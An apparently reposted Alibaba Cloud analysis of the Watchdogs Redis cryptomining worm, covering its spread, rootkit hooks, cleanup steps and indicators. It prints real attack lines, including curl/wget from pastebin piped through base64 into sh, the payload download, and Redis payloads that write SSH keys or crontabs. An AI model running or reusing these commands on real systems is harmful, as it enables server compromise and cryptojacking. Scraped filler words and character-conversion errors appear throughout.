2月20日17时许,阿里云安全监测到一块儿大规模挖矿事件,判断为Watchdogs蠕虫致使,并在第一时间进行了应急处置。ios
该蠕虫短期内即形成大量Linux主机沦陷,一方面是利用Redis未受权访问和弱密码这两种常见的配置问题进行传播,另外一方面从known_hosts文件读取ip列表,用于登陆信任该主机的其余主机。这两种传播手段都不是第一次用于蠕虫,但结合在一块儿爆发出巨大的威力。sql
然而Watchdogs并非第一个形成这般影响的Redis蠕虫。截至目前,Redis配置问题已惨遭40余种蠕虫攻击和利用;此外,其余种类数据库的配置问题,也难保不在未来成为黑客的目标。shell
所以,本文在分析这次Watchdogs挖矿蠕虫、提供清理建议的同时,也分析了数据库蠕虫的发展趋势,并针对相似的大规模入侵事件的应急和预防给出建议。数据库
该蠕虫的感染路径以下图所示。安全
蠕虫传播方式bash
攻击者首先扫描存在未受权访问或弱密码的Redis,并控制相应主机去请求如下地址:服务器
https://pastebin.com/raw/sByq0rym
该地址包含的命令是请求、base64解码并执行另外一个url地址的内容:微信
(curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|base64 -d|sh
而https://pastebin.com/raw/D8E71JBJ 的内容解码后为一个bash脚本,脚本中又包含下载恶意程序Watchdogs的指令。网络
(curl -fsSL http://thyrsi.com/t6/672/1550667479x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667479x1822611209.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs
如上图所示,本次蠕虫的横向传播分为两块。ssh
一是Bash脚本包含的以下内容,会直接读取主机上的/root/.ssh/known_hosts和/root/.ssh/id_rsa.pub文件,用于登陆信任当前主机的机器,并控制这些机器执行恶意指令。
二是Bash脚本下载的Watchdogs程序,经过对Redis的未受权访问和爆破、以及对SSH的爆破,进行横向传播。
具体为表现为,Watchdogs程序的Bbgo()函数中,首先获取要攻击的ip列表
随后尝试登陆其余主机的ssh服务,一旦登陆成功则执行恶意脚本下载命令
在Ago()函数中,则表现为针对其余主机Redis的扫描和攻击。
恶意Bash脚本
除了下载Watchdogs程序和横向传播外,Bash脚本还具备如下几项功能
1.将下载自身的指令添加到crontab定时任务,10分钟执行一次
2.杀死同类的挖矿僵尸木马进程
杀死cpu占用大于80%的其余进程
简而言之,bash脚本主要是完成恶意程序植入、持久化和一部分的横向传播功能。
Watchdogs分析
Watchdogs程序为elf可执行文件,由go语言编译,其主要函数结构以下图所示。
1.LibiosetWrite()
该函数主要执行libioset.so文件的写入
2.Cron()
将恶意下载命令添加到/etc/cron.d/root等多个文件中,定时执行,加大清理难度
3.KsoftirqdsWriteRun()
解压并写入挖矿程序及其配置文件
Bbgo()和Ago()函数的功能在“蠕虫传播方式”一节已有介绍,此处再也不赘述。
综上,Watchdogs程序在Bash脚本执行的基础上,将进一步进行挖矿程序的释放和执行、恶意so文件写入以及剩余的横向传播。
libioset.so分析
如图是libioset.so的导出函数表,包括unlink, rmdir, readdir等。
这里以执行rm命令必须调用的unlink()函数为例。
它只对不包含"ksoftirqds"、"ld.so.preload"、"libioset.so"这几个字符串的文件调用正常的unlink(),致使几个文件没法被正常删除。
其余几个命令,如readdir也是相似,没法正常返回关于恶意程序的结果。
而fopen函数更是变本加厉,因为系统查询cpu使用状况和端口占用状况时,都会调用fopen,因而攻击者hook了这一函数,使其在读取'/proc/stat'和'/proc/net/tcp'等文件时,调用伪造函数
其中forge_proc_cpu()函数,将返回硬编码的字符串
这种对查看系统状态功能的恶意hook,致使用户难以经过简单自查,肯定挖矿是否存在以及挖矿进程是哪一个。
这次的Watchdogs挖矿蠕虫与18年出现的kworkerd蠕虫出自同一位做者(关于kworkerd挖矿僵尸网络参见《2018年云上挖矿分析报告》),由于它们使用了相同的钱包地址和类似的攻击手法。此外做者在恶意脚本末尾的注释也印证了这点:
#1.If you crack my program, please don't reveal too much code online.Many hacker boys have copied my kworkerds code,more systems are being attacked.(Especially libioset)...
这段注释同时也揭露了一个事实,“许多黑客模仿个人代码”——当一个攻击者采起了某种攻击手法并取得成功,其余攻击者会纷纷模仿,很快将该手段加入本身的“攻击大礼包”。
这种模仿的结果是,据阿里云安全不彻底统计,利用Redis未受权访问等问题进行攻击的蠕虫,数量已从2018年中的一个,上涨到现在的40余个,其中不乏DDG、8220这样臭名昭著的挖矿团伙。此外大部分近期新出现的蠕虫,都会加上Redis利用模块,由于实践证实互联网上错误配置的Redis数据库数量庞大,能从其中分一杯羹,攻击者的盈利就能有很大的提高。
于是若是不保护好Redis,用户面临的将不是一个蠕虫,而是40余个蠕虫此起彼伏的攻击。
下图所示为近半年来,针对Redis的攻击流量和目标机器数量趋势,从中不难看出Redis攻击逐渐被各大僵尸网络采用,并在2018年10月11月保持很是高的攻击量;然后在经历了3个月左右的沉寂期后,在今年2月再次爆发。
而Redis自己遭受攻击的主流方法也通过了三个阶段
1.攻击者对存在未受权访问的Redis服务器写入ssh key,从而能够畅通无阻登陆ssh服务
具体为执行如下payload
config set dir /root/.ssh/ config set dbfilename authorized_keys set x "\n\n\nssh-rsa 【sshkey】 root@kali\n\n\n" save
其中【sshkey】表示攻击者的密钥
2.攻击者对存在未受权访问的Redis服务器写入crontab文件,定时执行恶意操做
具体为执行如下payload
config set dir /var/spool/cron config set dbfilename root set x "【evil command】" save
其中【evil command】表示定时执行的恶意命令
3.以上两个阶段中仅对Redis彻底没有验证便可访问的状况,第三个阶段则开始针对设置了密码验证,但密码较弱的Redis进行攻击,受害范围进一步扩大。
然而Redis并非惟一一个受到黑客“青眼”的数据库。以下表所示,SQL Server, Mysql, Mongodb这些经常使用数据库的安全问题,也被多个挖矿僵尸网络所利用;利用方式集中在未受权访问、密码爆破和漏洞利用。
1.首先中止cron服务,避免因其不断执行而致使恶意文件反复下载执行。
若是操做系统可使用service命令,则执行
service crond stop
若是没有service命令,执行
/etc/init.d/cron stop
2.随后使用busybox删除如下两个so文件:
sudo busybox rm -f /etc/ld.so.preload sudo busybox rm -f /usr/local/lib/libioset.so sudo ldconfig
busybox是一个小巧的unix工具集,许多Linux系统装机时已集成。使用它进行删除是由于系统自带的rm命令须要进行动态so库调用,而so库被恶意hook了,没法进行正常删除;而busybox的rm是静态编译的,无需调用so文件,因此不受影响。
3.清理恶意进程
sudo kill -9 `ps -ef|grep Watchdogs|grep -v grep |awk '{print $2}'` sudo kill -9 `ps -ef|grep ksoftirqds|grep -v grep |awk '{print $2}'`
4.清理cron相关文件,重启服务,具体为检查如下文件并清除其中的恶意指令:
/var/spool/cron/crontabs/root /var/spool/cron/root /etc/cron.d/root
以后执行
service crond start
或
/etc/init.d/cron start
数字加密货币的获取依赖计算资源的特质,催生了黑客进行大规模入侵的动机和土壤;相似Watchdogs蠕虫这样的数据库入侵事件,不是第一块儿,也不会是最后一块儿。阿里云做为“编写时即考虑安全性”的平台,提供良好的安全基础设施和丰富的安全产品,帮助用户抵御挖矿和入侵,同时提供如下安全建议:
1.在入侵发生以前,增强数据库服务的密码,尽可能不将数据库服务开放在互联网上,或根据实际状况进行访问控制(ACL)。这些措施可以帮助有效预防挖矿、勒索等攻击。平时还要注意备份资料,重视安全产品告警。
2.若是怀疑主机已被入侵挖矿,对于自身懂安全的用户,在攻击者手段较简单的状况下,能够经过自查cpu使用状况、运行进程、定时任务等方式,锁定入侵源头。
3.对于攻击者采用较多隐藏手段的攻击(如本次的Watchdogs蠕虫,使ps、top等系统命令失效),建议使用阿里云安全的下一代云防火墙产品,其阻断恶意外联、可以配置智能策略的功能,可以有效帮助防护入侵。哪怕攻击者在主机上的隐藏手段再高明,下载、挖矿、反弹shell这些操做,都须要进行恶意外联;云防火墙的拦截将完全阻断攻击链。此外,用户还能够经过自定义策略,直接屏蔽pastebin.com、thrysi.com等普遍被挖矿蠕虫利用的网站,达到阻断入侵的目的。
如图是云防火墙帮助用户拦截这次Watchdogs蠕虫下载的例子,图中共拦截23次对pastebin.com的请求;这些拦截致使主机未下载恶意脚本,从而就不会发起对thrysi.com的请求,故规则命中次数为0。
以上截图代表Watchdogs的攻击链未能执行到下一步,拦截起到了很好的效果。
4.对于有更高定制化要求的用户,能够考虑使用阿里云安全管家服务。购买服务后将有经验丰富的安全专家提供咨询服务,定制适合您的方案,帮助加固系统,预防入侵。入侵事件发生后,也可介入直接协助入侵后的清理、事件溯源等,适合有较高安全需求的用户,或未雇佣安全工程师,但但愿保障系统安全的企业。
钱包地址
46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4Ava
矿池地址
xmr.f2pool.com
恶意url
pastebin.com/raw/sByq0rym
thyrsi.com/t6/672/1550667515x1822611209.jpg
恶意文件
原文连接 更多技术干货 请关注阿里云云栖社区微信号 :yunqiinsight